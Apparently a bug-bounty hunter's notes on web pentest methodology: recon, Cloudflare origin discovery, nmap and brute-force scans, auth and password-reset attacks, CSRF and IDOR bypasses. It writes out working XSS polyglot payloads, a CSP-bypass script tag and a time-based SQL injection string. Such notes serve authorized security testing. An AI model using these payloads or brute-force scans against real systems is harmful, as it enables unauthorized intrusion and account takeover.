A Small Set of Customized Tools for Merry Making
TODO:
- Install: Gopass for bug bounties
- Canibalise: Domain enum & Info Gathering & reddit comments & HN comments & naughty strings & seclists security idiots payload all the things polyglot payloads
- Hackbar - Firefox add-on -- looks useful
Steps:
- Discovery / Mapping:
- Linked Resources:
- Find inscope domains with enum-domains
- Try to eliminate cloudflare:
- Use enum-domains
csv
list for non-cloudflair ips - historical lookup: http://toolbar.netcraft.com/site_report?url=example.com
- dig:
dig ANY example.com
- get them to send an email & check headers
- https://rhinosecuritylabs.com/cloud-security/cloudflare-bypassing-cloud-security/
- Signup & look at email headers for ip
- Use enum-domains
- Reverse IP lookup: https://github.com/darkoperator/dnsrecon
- haven't tried ^ yet
- Recon in social networks:
- Figure out tech stack and the like using job posting, people's experience, etc.
- Reddit / github / monster / LinkedIn / indeed / etc
- Try to eliminate cloudflare:
- via: virustotal =>
https://virustotal.com/en/domain/<domain>/information/
- Observed subdomains
- via: similarweb
- Use transparent certs lookup:
- Scan subdomains for popular services / plugins
- curl subdomain, then cat response & grep for service strings
- eg: facebook, wordpress, surveygizmo, aws, shopify, unbounce, fastly, heroku, github, desk, tumblr
- Save so that you can go back historically if you find vulns
- TODO: write that tool
- curl subdomain, then cat response & grep for service strings
- nmap scans:
- Port scan:
nmap -sS -A -PN -p- --script=http-title example.com
- Alternatives:
nmap -T4 -A -v -Pn example.com
nmap-domains/scan.rb
to scannmap iL list-of-ips.txt
- Alternatives:
- Attack individual targets as available
- Port scan:
- Find inscope domains with enum-domains
- Unlinked Resources:
dir-buster
to brute force- use seclists to augment:
- RAFT lists
- Git digger
- svn digger
- use seclists to augment:
- Try spidering deeper:
- Linked Resources:
acme.com - 200
acme.com/backlog/ - 404
acme.com/controlpanel/ - 401 <-- dig deeper
acme.com/controlpanel/[bruteforce here now]
- Tech stack -- check for CVEs against results here:
- Wappalyzer (chrome)
- Builtwith (chrome)
- retire.js
- Custom engines
- OSINT:
- Use past flaws to pivot into new flaws
- xssed.com
- reddit xss
- punkspider
- xss.cx
- xssposed.org
- twitter search
- Use past flaws to pivot into new flaws
- SWFs search:
- Google dorks:
site:url.com ext:swf
- Google dorks:
- Login w/ Facebook connect
- look for
redirect_uri
& open redirects- Links to learn, I don't understand open redirect:
- want to get tokens / access tokens
- http://homakov.blogspot.se/2013/02/hacking-facebook-with-oauth2-and-chrome.html
- http://www.breaksec.com/?p=6039 Facebook Connect
- Links to learn, I don't understand open redirect:
- look for
- 3rd Party Scripts
- look for url downloads in scripts
- are there url query parameters used in scripts?
(get)?(query|url|qs|hash)param
location\.(hash|href|search)\.match
- bypass Content Security Policy
- Look at CSP domains, use those as attack vector
- eg:
<script src="mixpanel.com?callback=alert(1)">
- look for url downloads in scripts
- Initial Assessment
- Visit the search, registration, contact, password reset, and comment forms and hit them with your polyglot strings
- Scan those specific functions with Burp’s built-in scanner
- Check your cookie, log out, check cookie, log in, check cookie. Submit old cookie, see if access.
- Perform user enumeration checks on login, registration, and password reset.
- Do a reset and see if; the password comes plaintext, uses a URL based token, is predictable, can be used multiple times, or logs you in automatically
- Find numeric account identifiers anywhere in URLs and rotate them for context change
- Find the security-sensitive function(s) or files and see if vulnerable to non-auth browsing (idors), lower-auth browsing, CSRF, CSRF protection bypass, and see if they can be done over HTTP.
- Directory brute for top short list on SecLists
- Check upload functions for alternate file types that can execute code (xss or php/etc/etc)
- FTP-Brute:
nmap --script=ftp* -p 21 target.com
- SSH-Brute:
nmap --script=ssh* -p 22 target.com
- Enum users:
nmap –script=smtp-enum-users target.com
- http://pentestmonkey.net/tools/user-enumeration/smtp-user-enum
nmap -p 4369 --script epmd-info <target>
- Try to chain attacks in auth:
- reset password + brute force tokens
- Timing Attack: Try to register / reset password / etc
- Time how long it takes for known success vs known failed
- Ref: http://cwe.mitre.org/data/definitions/208
- TFA backup codes
- TFA codes
- Password reset tokens
- polyglot payloads:
1. <PLAINTEXT>
2. "><img src=x onerror=confirm(1);>
3. jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
4. ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
5. '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
6. " onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
7. javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
- 3rd party vectors:
- facebook login, google login, etc.
- dynamic anchor tags in url:
http://example.com#<xss-here>
- in redirects
- js embedded in swf: have parameters that can be injected
- cure53/flashbang
- XSS'd username + password reset
- event / meeting names
- File upload names
- polyglots:
1. SLEEP(10) /*' or SLEEP(10) or '" or SLEEP(10) or "*/
-
git:danielmiessier/SecLists -> fuzzing
-
blind is most common; error based rarer
-
Sqlmap is the best tool
- Use fuzz string, then sqlmap
-
Take burp logfile & run sqlmap with
-l
- Burp plugin: SQLiPy right click to send to sqlmap
-
Common injections:
- id, currency values, item numbers, sorting/ordering params, json & xml values, cookie values, custom headers
-
Platform Specific:
- mySQL
- PentestMonkey's mySQL injection cheat sheet
- Reiners mySQL injection Filter Evasion Cheatsheet
- MSSQL
- EvilSQL's Error/Union/Blind MSSQL Cheatsheet
- PentestMonkey's MSSQL SQLi injection Cheat Sheet
- ORACLE
- PentestMonkey's Oracle SQLi Cheatsheet
- POSTGRESQL
- PentestMonkey's Postgres SQLi Cheatsheet
- Others
- Access SQLi Cheatsheet
- PentestMonkey's Ingres SQL Injection Cheat Sheet
- pentestmonkey's DB2 SQL Injection Cheat Sheet
- pentestmonkey's Informix SQL Injection Cheat Sheet
- SQLite3 Injection Cheat sheet
- Ruby on Rails (Active Record) SQL Injection Guide
- mySQL
- Find file polyglots
- Manipulate meta-data
- To watch: http://goo.gl/VCXPh6
- git:danielmiessier/SecLists -> LFI
- common params:
- file=, location=, locale=, path=, display=, load=, read=, retrieve=
- hard to get right for devs
- Common params:
- dest, continue, redirect, url, uri, window, next
- file, folder, path, style, template, php_path, doc, document, root, pg, pdf
- LFI params too
- git:danielmiessier/SecLists -> LFI
- Use burp!
- Bypasses:
- remove CSRF token from request
- remove CSRF token parameter value
- Add bad control characters
- use a second identical CSRF param
- change POST to GET
- Burpy Tool (Debasish Mandal)
- Run against a burp log file
- Autorize burp plugin:
- git:quitten/autorize
- Insecure Direct Object Reference
- UIDs: ++, --, negative values
- Check files with/without auth
- HTTPS everywhere